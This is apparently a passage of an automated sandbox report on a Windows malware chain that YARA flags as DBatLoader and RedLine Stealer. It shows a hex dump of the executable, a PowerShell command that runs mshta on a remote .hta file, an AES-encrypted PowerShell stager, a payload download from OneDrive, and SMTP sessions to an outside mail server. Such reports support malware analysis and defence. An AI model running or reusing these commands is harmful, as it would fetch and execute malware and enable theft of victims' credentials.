                                                                                                                          Content-Length: 1646592
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Tue, 23 Apr 2024 08:40:32 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-ServerName: ipvsproxy74.ad.aruba.it
                                                                                                                          2024-04-24 04:45:28 UTC16116INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                          2024-04-24 04:45:28 UTC16384INData Raw: eb 1c 8b 46 fc 29 d0 eb 15 5a 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5f 5e 5b c3 8b c0 85 c0 74 0a 8b 50 f8 42 7e 04 f0 ff 40 f8 c3 90 85 c0 74 02 c3 00 b8 2d 4b 40 00 c3 8b 10 85 d2 74 38 8b 4a f8 49 74 32 53 89 c3 8b 42 fc e8 dd fb ff ff 89 c2 8b 03 89 13 50 8b 48 fc e8 22 e3 ff ff 58 8b 48 f8 49 7c 0e f0 ff 48 f8 75 08 8d 40 f8 e8 39 e1 ff ff 8b 13 5b 89 d0 c3 8d 40 00 e9 b7 ff ff ff c3 8b c0 e9 af ff ff ff c3 8b c0 53 85 c0 74 2d 8b 58 fc 85 db 74 26 4a 7c 1b 39 da 7d 1f 29 d3 85 c9 7c 19 39 d9 7f 11 01 c2 8b 44 24 08 e8 a4 fb ff ff eb 11 31 d2 eb e5 89 d9 eb eb 8b 44 24 08 e8 a1 fa ff ff 5b c2 04 00 c3 53 56 57 89 c3 89 d6 89 cf e8 a2 ff ff ff 8b 13 85 d2 74 30 8b 4a fc 4e 7c 2a 39 ce 7d 26 85 ff 7e 22 29 f1 39 cf 7e 02 89 cf 29
                                                                                                                          Data Ascii: F)Z8u8u8u8_^[tPB~@t-K@t8JIt2SBPH"XHI|Hu@9[@St-Xt&J|9})|9D$1D$[SVWt0JN|*9}&~")9~)
                                                                                                                          2024-04-24 04:45:28 UTC16384INData Raw: ae b8 fe ff ff ff 29 c8 89 d7 c3 90 89 fa 89 c7 b9 ff ff ff ff 32 c0 f2 ae 8d 47 ff 89 d7 c3 90 56 8b f0 92 e8 5f a3 ff ff 8b c6 5e c3 8d 40 00 29 c2 a9 01 00 00 00 50 74 0b 0f b6 0c 02 88 08 85 c9 74 1b 40 0f b6 0c 02 85 c9 74 14 0f b7 0c 02 66 89 08 83 c0 02 81 f9 ff 00 00 00 77 e6 58 c3 88 08 58 c3 8d 40 00 57 56 53 89 c6 89 d7 89 cb 32 c0 85 c9 74 05 f2 ae 75 01 41 29 cb 89 f7 89 d6 89 fa 89 d9 c1 e9 02 f3 a5 89 d9 83 e1 03 f3 a4 aa 89 d0 5b 5e 5f c3 8d 40 00 53 56 57 8b f2 8b f8 8b de 85 db 74 05 83 eb 04 8b 1b 8b c6 e8 7f bf ff ff 8b d0 8b cb 8b c7 e8 a8 ff ff ff 5f 5e 5b c3 53 56 57 8b f9 8b f2 8b d8 8b c6 e8 60 bf ff ff 8b d0 8b cf 8b c3 e8 89 ff ff ff 5f 5e 5b c3 90 29 c2 75 03 31 c0 c3 0f b6 0c 02 3a 08 75 76 84 c9 74 72 0f b6 4c 02 01 3a 48 01
                                                                                                                          Data Ascii: )2GV_^@)Ptt@tfwXX@WVS2tuA)[^_@SVWt_^[SVW`_^[)u1:uvtrL:H
                                                                                                                          2024-04-24 04:45:28 UTC16384INData Raw: e8 4b bb ff ff a2 0c 08 57 00 b1 2f ba 1d 00 00 00 8b c3 e8 90 e8 ff ff a2 0d 08 57 00 8d 45 dc 50 b9 fc cc 40 00 ba 1f 00 00 00 8b c3 e8 2a e8 ff ff 8b 45 dc 8d 55 e0 e8 5b eb ff ff 8b 55 e0 b8 10 08 57 00 e8 7a 7b ff ff 8d 45 d4 50 b9 0c cd 40 00 ba 20 00 00 00 8b c3 e8 fd e7 ff ff 8b 45 d4 8d 55 d8 e8 2e eb ff ff 8b 55 d8 b8 14 08 57 00 e8 4d 7b ff ff b1 3a ba 1e 00 00 00 8b c3 e8 23 e8 ff ff a2 18 08 57 00 8d 45 d0 50 b9 24 cd 40 00 ba 28 00 00 00 8b c3 e8 bd e7 ff ff 8b 55 d0 b8 1c 08 57 00 e8 18 7b ff ff 8d 45 cc 50 b9 30 cd 40 00 ba 29 00 00 00 8b c3 e8 9b e7 ff ff 8b 55 cc b8 20 08 57 00 e8 f6 7a ff ff 8d 45 f8 e8 9a 7a ff ff 8d 45 f4 e8 92 7a ff ff 8d 45 c8 50 b9 f0 cc 40 00 ba 25 00 00 00 8b c3 e8 69 e7 ff ff 8b 45 c8 33 d2 e8 53 ba ff ff 85 c0
                                                                                                                          Data Ascii: KW/WEP@*EU[UWz{EP@ EU.UWM{:#WEP$@(UW{EP0@)U WzEzEzEP@%iE3S
                                                                                                                          2024-04-24 04:45:28 UTC16384INData Raw: 5c ff ff c3 e9 cf 34 ff ff eb ee 0f b6 45 ff 5f 5e 5b 59 5d c3 8d 40 00 55 8b ec 81 c4 f0 fe ff ff 53 56 57 33 c9 89 4d f0 89 55 f8 89 45 fc 33 c0 55 68 e2 0b 41 00 64 ff 30 64 89 20 c6 45 f7 00 68 a8 12 57 00 e8 39 5b ff ff 33 c0 55 68 c5 0b 41 00 64 ff 30 64 89 20 a1 a4 12 57 00 e8 6d 4a ff ff 8b f0 85 f6 7c 50 46 33 ff a1 a4 12 57 00 8b 1c b8 85 db 74 3d 3b 1d 14 9a 45 00 74 35 8d 95 f0 fe ff ff 8b 03 e8 af 2b ff ff 8d 95 f0 fe ff ff 8d 45 f0 e8 39 3d ff ff 8b 45 f0 8b 55 fc e8 3e 77 ff ff 84 c0 74 0b 8b 45 f8 89 18 c6 45 f7 01 eb 04 47 4e 75 b3 33 c0 5a 59 59 64 89 10 68 cc 0b 41 00 68 a8 12 57 00 e8 94 5b ff ff c3 e9 02 34 ff ff eb ee 33 c0 5a 59 59 64 89 10 68 e9 0b 41 00 8d 45 f0 e8 83 3a ff ff c3 e9 e5 33 ff ff eb f0 0f b6 45 f7 5f 5e 5b 8b e5 5d
                                                                                                                          Data Ascii: \4E_^[Y]@USVW3MUE3UhAd0d EhW9[3UhAd0d WmJ|PF3Wt=;Et5+E9=EU>wtEEGNu3ZYYdhAhW[43ZYYdhAE:3E_^[]
                                                                                                                          2024-04-24 04:45:28 UTC16384INData Raw: 10 5b c3 90 55 8b ec 53 56 8b 45 08 8b 40 fc 8b 70 20 85 f6 74 2d b3 01 8b 45 08 8b c6 8b 15 ac 1f 41 00 e8 c0 ee fe ff 84 c0 74 27 8b 45 08 8b d6 8b 45 08 8b 40 f8 e8 80 00 00 00 8b d8 80 f3 01 eb 10 8b 45 08 8b 40 f8 8b 10 ff 52 14 85 c0 0f 9f c3 8b c3 5e 5b 5d c3 8d 40 00 55 8b ec 83 c4 f8 53 89 55 fc 89 45 f8 8b 45 f8 50 68 18 53 41 00 8b 45 f8 50 68 b0 56 41 00 55 e8 83 ff ff ff 59 8b c8 ba 94 4b 41 00 8b 45 fc 8b 18 ff 53 04 5b 59 59 5d c3 00 00 ff ff ff ff 07 00 00 00 53 74 72 69 6e 67 73 00 ff 48 10 83 78 10 00 75 07 33 d2 8b 08 ff 51 30 c3 8d 40 00 55 8b ec 83 c4 ec 53 56 57 33 c9 89 4d f0 89 4d ec 89 55 f8 89 45 fc 33 c0 55 68 45 4c 41 00 64 ff 30 64 89 20 c6 45 f7 00 8b 45 fc 8b 10 ff 52 14 8b d8 8b 45 f8 8b 10 ff 52 14 3b d8 75 3b 8b f3 4e 85
                                                                                                                          Data Ascii: [USVE@p t-EAt'EE@E@R^[]@USUEEPhSAEPhVAUYKAES[YY]StringsHxu3Q0@USVW3MMUE3UhELAd0d EERER;u;N
                                                                                                                          2024-04-24 04:45:28 UTC16384INData Raw: fc 00 8d 55 f0 b9 01 00 00 00 b8 24 8b 41 00 e8 e4 06 ff ff 8b 03 e8 e1 b0 ff ff 84 c0 74 d3 5f 5e 5b 8b e5 5d c3 00 00 ff ff ff ff 05 00 00 00 25 73 5f 25 64 00 00 00 55 8b ec 83 c4 d0 53 56 57 33 c9 89 4d d4 89 4d d0 89 4d d8 89 4d dc 89 4d e0 89 4d e4 89 55 f8 89 45 fc 33 c0 55 68 4d 8e 41 00 64 ff 30 64 89 20 8b 45 fc e8 b7 03 00 00 33 c0 89 45 f4 a1 c4 12 57 00 8b 10 ff 52 14 33 c0 55 68 2b 8e 41 00 64 ff 30 64 89 20 33 c0 55 68 ec 8d 41 00 64 ff 30 64 89 20 8d 4d f0 8d 55 ef 8b 45 fc 8b 18 ff 53 28 83 7d f8 00 75 35 8d 55 e4 8b 45 fc e8 91 03 00 00 8b 45 e4 e8 0d ac ff ff 33 c9 b2 01 ff 50 2c 89 45 f4 8d 55 e0 8b 45 fc e8 74 03 00 00 8b 55 e0 8b 45 f4 8b 08 ff 51 18 eb 58 8b 45 f8 89 45 f4 8d 55 dc 8b 45 fc e8 56 03 00 00 8b 45 f4 f6 40 1c 10 74 0d
                                                                                                                          Data Ascii: U$At_^[]%s_%dUSVW3MMMMMMUE3UhMAd0d E3EWR3Uh+Ad0d 3UhAd0d MUES(}u5UEE3P,EUEtUEQXEEUEVE@t
                                                                                                                          2024-04-24 04:45:28 UTC16384INData Raw: 57 8b 7d 0c 8b 75 08 80 3d 3b 13 57 00 00 75 2e b9 08 cc 41 00 8b 15 28 13 57 00 b0 07 e8 2e fa ff ff a3 28 13 57 00 8b 45 14 50 8b 45 10 50 57 56 ff 15 28 13 57 00 8b d8 e9 c2 00 00 00 33 db 83 7d 10 00 0f 84 b6 00 00 00 33 c0 89 45 e4 33 c0 89 45 e8 6a 00 ff 15 0c 13 57 00 89 45 ec 6a 01 ff 15 0c 13 57 00 89 45 f0 85 f6 74 65 8d 45 d4 50 56 e8 24 9d fe ff 89 45 f4 8d 45 f8 50 56 e8 27 9d fe ff 85 c0 74 77 8b 45 fc f7 d8 50 8b 45 f8 f7 d8 50 8d 45 e4 50 e8 b6 a1 fe ff 8d 45 d4 50 8d 45 e4 50 8d 45 e4 50 e8 f5 a0 fe ff 85 c0 74 04 85 ff 74 36 57 8d 45 e4 50 8d 45 e4 50 e8 df a0 fe ff 85 c0 75 24 83 7d f4 01 75 31 b3 01 eb 2d 85 ff 74 16 57 8d 45 e4 50 8d 45 e4 50 e8 bf a0 fe ff 85 c0 75 04 b3 01 eb 13 8b 45 14 50 8d 45 e4 50 56 68 42 00 34 12 ff 55 10 8b
                                                                                                                          Data Ascii: W}u=;Wu.A(W.(WEPEPWV(W3}3E3EjWEjWEteEPV$EEPV'twEPEPEPEPEPEPtt6WEPEPu$}u1-tWEPEPuEPEPVhB4U
                                                                                                                          2024-04-24 04:45:28 UTC16384INData Raw: 33 d2 55 68 5a 0b 42 00 64 ff 32 64 89 22 6a 68 8b 45 f8 50 e8 ab 5d fe ff 83 f8 10 7c 2f 8d 43 04 50 6a 08 6a 00 a1 48 13 57 00 50 e8 a3 5d fe ff 0f b7 43 02 8d 44 83 e4 50 6a 08 6a 08 a1 48 13 57 00 50 e8 8b 5d fe ff c6 45 ff 01 33 c0 5a 59 59 64 89 10 68 61 0b 42 00 8b 45 f8 50 6a 00 e8 47 62 fe ff c3 e9 6d 34 fe ff eb ed 0f b6 45 ff 5b 59 59 5d c3 8b c0 53 56 57 81 c4 fc fb ff ff 8b f8 33 f6 66 c7 04 24 00 03 85 ff 74 38 6a 00 e8 9e 5c fe ff 8b d8 57 53 e8 bd 5d fe ff 8b f8 8d 44 24 04 50 68 00 01 00 00 6a 00 53 e8 01 5d fe ff 66 89 44 24 02 57 53 e8 9d 5d fe ff 53 e8 af 5c fe ff eb 14 66 89 4c 24 02 8b c2 8d 54 24 04 03 c9 03 c9 e8 ad 22 fe ff 66 83 7c 24 02 00 74 2b 66 83 7c 24 02 10 75 0b 8b c4 e8 ee fe ff ff 84 c0 75 0e 0f b7 54 24 02 8d 44 24 04
                                                                                                                          Data Ascii: 3UhZBd2d"jhEP]|/CPjjHWP]CDPjjHWP]E3ZYYdhaBEPjGbm4E[YY]SVW3f$t8j\WS]D$PhjS]fD$WS]S\fL$T$"f|$t+f|$uuT$D$
                                                                                                                          2024-04-24 04:45:28 UTC16384INData Raw: c3 e9 d2 f4 fd ff eb f8 5d c3 8b c0 4c 4b 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 4b 42 00 04 00 00 00 a0 10 40 00 80 3a 40 00 8c 3a 40 00 90 3a 40 00 94 3a 40 00 88 3a 40 00 e8 37 40 00 04 38 40 00 40 38 40 00 cc 4b 42 00 d0 4b 42 00 0e 54 53 79 6e 63 68 72 6f 4f 62 6a 65 63 74 90 b0 4b 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 4b 42 00 1c 00 00 00 00 4b 42 00 80 3a 40 00 8c 3a 40 00 90 3a 40 00 94 3a 40 00 88 3a 40 00 e8 37 40 00 04 38 40 00 14 4c 42 00 44 4c 42 00 50 4c 42 00 10 54 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 8d 40 00 c3 8d 40 00 c3 8d 40 00 53 56 84 d2 74 08 83 c4 f0 e8 7a ef fd ff 8b da 8b f0 33 d2 8b c6 e8 31 ec fd ff 8d 46 04 50
                                                                                                                          Data Ascii: ]LKBTKB@:@:@:@:@:@7@8@@8@KBKBTSynchroObjectKBKBKB:@:@:@:@:@7@8@LBDLBPLBTCriticalSection@@@SVtz31FP


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.74971613.107.139.114438080C:\Users\user\AppData\Roaming\uc.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-24 04:45:32 UTC213OUTGET /download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                          Host: onedrive.live.com
                                                                                                                          2024-04-24 04:45:33 UTC1165INHTTP/1.1 302 Found
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Pragma: no-cache
                                                                                                                          Content-Type: text/html
                                                                                                                          Expires: -1
                                                                                                                          Location: https://zyupsq.by.files.1drv.com/y4mZWAAbbWbD2Z_SLbFHXttkWK-AZlqt62tunxr4xpHZuH07d5XHa5kbVXE61GY17Y28186nw-ek1Ds2XbchrhSTbOW4oRk7ufrrG4qLaI4J3DOjPAYH2PRgLqWYP8iX9iQ-cDpcG1nTyrYPpCzRyGTHwQE321S3MeJCqEMQWkMCTAyeOJgGrRANqOF7fqjFj04tiS3-yiZMZVNCBP1OXgsNw/ori?download&psid=1
                                                                                                                          Set-Cookie: E=P:4JcYYBlk3Ig=:iozxzn9ily+JGu13FGexKk+nOPUbUiDvxqC7EBwT4lo=:F; domain=.live.com; path=/
                                                                                                                          Set-Cookie: xid=7a5528bd-8258-4c2e-8e86-f30686e2b703&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/
                                                                                                                          Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                          Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 03:05:32 GMT; path=/
                                                                                                                          Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 04:45:33 GMT; path=/
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-MSNServer: 58656754b6-kx22h
                                                                                                                          X-ODWebServer: namsouthce155880-odwebpl
                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                          X-MSEdge-Ref: Ref A: 4311158B745143B9BBBDC5B91B8D565B Ref B: BY3EDGE0319 Ref C: 2024-04-24T04:45:32Z
                                                                                                                          Date: Wed, 24 Apr 2024 04:45:32 GMT
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 0


                                                                                                                          SMTP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                          Apr 24, 2024 06:45:43.317347050 CEST58749721192.185.124.132192.168.2.7220-m5.websitewelcome.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 23:45:43 -0500
                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                          220 and/or bulk e-mail.
                                                                                                                          Apr 24, 2024 06:45:43.321599007 CEST49721587192.168.2.7192.185.124.132EHLO 035347
                                                                                                                          Apr 24, 2024 06:45:43.519418955 CEST58749721192.185.124.132192.168.2.7250-m5.websitewelcome.com Hello 035347 [154.16.105.36]
                                                                                                                          250-SIZE 52428800
                                                                                                                          250-8BITMIME
                                                                                                                          250-PIPELINING
                                                                                                                          250-PIPECONNECT
                                                                                                                          250-AUTH PLAIN LOGIN
                                                                                                                          250-STARTTLS
                                                                                                                          250 HELP
                                                                                                                          Apr 24, 2024 06:45:43.519639015 CEST49721587192.168.2.7192.185.124.132STARTTLS
                                                                                                                          Apr 24, 2024 06:45:43.718705893 CEST58749721192.185.124.132192.168.2.7220 TLS go ahead
                                                                                                                          Apr 24, 2024 06:45:56.168767929 CEST58749722192.185.124.132192.168.2.7220-m5.websitewelcome.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 23:45:56 -0500
                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                          220 and/or bulk e-mail.
                                                                                                                          Apr 24, 2024 06:45:56.169078112 CEST49722587192.168.2.7192.185.124.132EHLO 035347
                                                                                                                          Apr 24, 2024 06:45:56.367539883 CEST58749722192.185.124.132192.168.2.7250-m5.websitewelcome.com Hello 035347 [154.16.105.36]
                                                                                                                          250-SIZE 52428800
                                                                                                                          250-8BITMIME
                                                                                                                          250-PIPELINING
                                                                                                                          250-PIPECONNECT
                                                                                                                          250-AUTH PLAIN LOGIN
                                                                                                                          250-STARTTLS
                                                                                                                          250 HELP
                                                                                                                          Apr 24, 2024 06:45:56.371162891 CEST49722587192.168.2.7192.185.124.132STARTTLS
                                                                                                                          Apr 24, 2024 06:45:56.571888924 CEST58749722192.185.124.132192.168.2.7220 TLS go ahead
                                                                                                                          Apr 24, 2024 06:46:07.610466003 CEST58749723192.185.124.132192.168.2.7220-m5.websitewelcome.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 23:46:07 -0500
                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                          220 and/or bulk e-mail.
                                                                                                                          Apr 24, 2024 06:46:07.611737967 CEST49723587192.168.2.7192.185.124.132EHLO 035347
                                                                                                                          Apr 24, 2024 06:46:07.809578896 CEST58749723192.185.124.132192.168.2.7250-m5.websitewelcome.com Hello 035347 [154.16.105.36]
                                                                                                                          250-SIZE 52428800
                                                                                                                          250-8BITMIME
                                                                                                                          250-PIPELINING
                                                                                                                          250-PIPECONNECT
                                                                                                                          250-AUTH PLAIN LOGIN
                                                                                                                          250-STARTTLS
                                                                                                                          250 HELP
                                                                                                                          Apr 24, 2024 06:46:07.809763908 CEST49723587192.168.2.7192.185.124.132STARTTLS
                                                                                                                          Apr 24, 2024 06:46:08.009613037 CEST58749723192.185.124.132192.168.2.7220 TLS go ahead

                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:1
                                                                                                                          Start time:06:45:13
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
                                                                                                                          Imagebase:0x7ff741d30000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:2
                                                                                                                          Start time:06:45:13
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:9
                                                                                                                          Start time:06:45:15
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\System32\mshta.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
                                                                                                                          Imagebase:0x7ff6f38a0000
                                                                                                                          File size:14'848 bytes
                                                                                                                          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:14
                                                                                                                          Start time:06:45:18
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                          Imagebase:0x7ff7b4ee0000
                                                                                                                          File size:55'320 bytes
                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:15
                                                                                                                          Start time:06:45:19
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
                                                                                                                          Imagebase:0x7ff741d30000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:16
                                                                                                                          Start time:06:45:19
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:17
                                                                                                                          Start time:06:45:20
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
                                                                                                                          Imagebase:0x7ff741d30000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:19
                                                                                                                          Start time:06:45:30
                                                                                                                          Start date:24/04/2024
                                                                                                                          Path:C:\Users\user\AppData\Roaming\uc.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\uc.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'646'592 bytes
                                                                                                                          MD5 hash:E6AC6CA27AA2D60DC59A21AF1FFDB086
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000013.00000002.1499010628.0000000002385000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000003.1494437975.000000007EB10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000013.00000003.1438376010.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
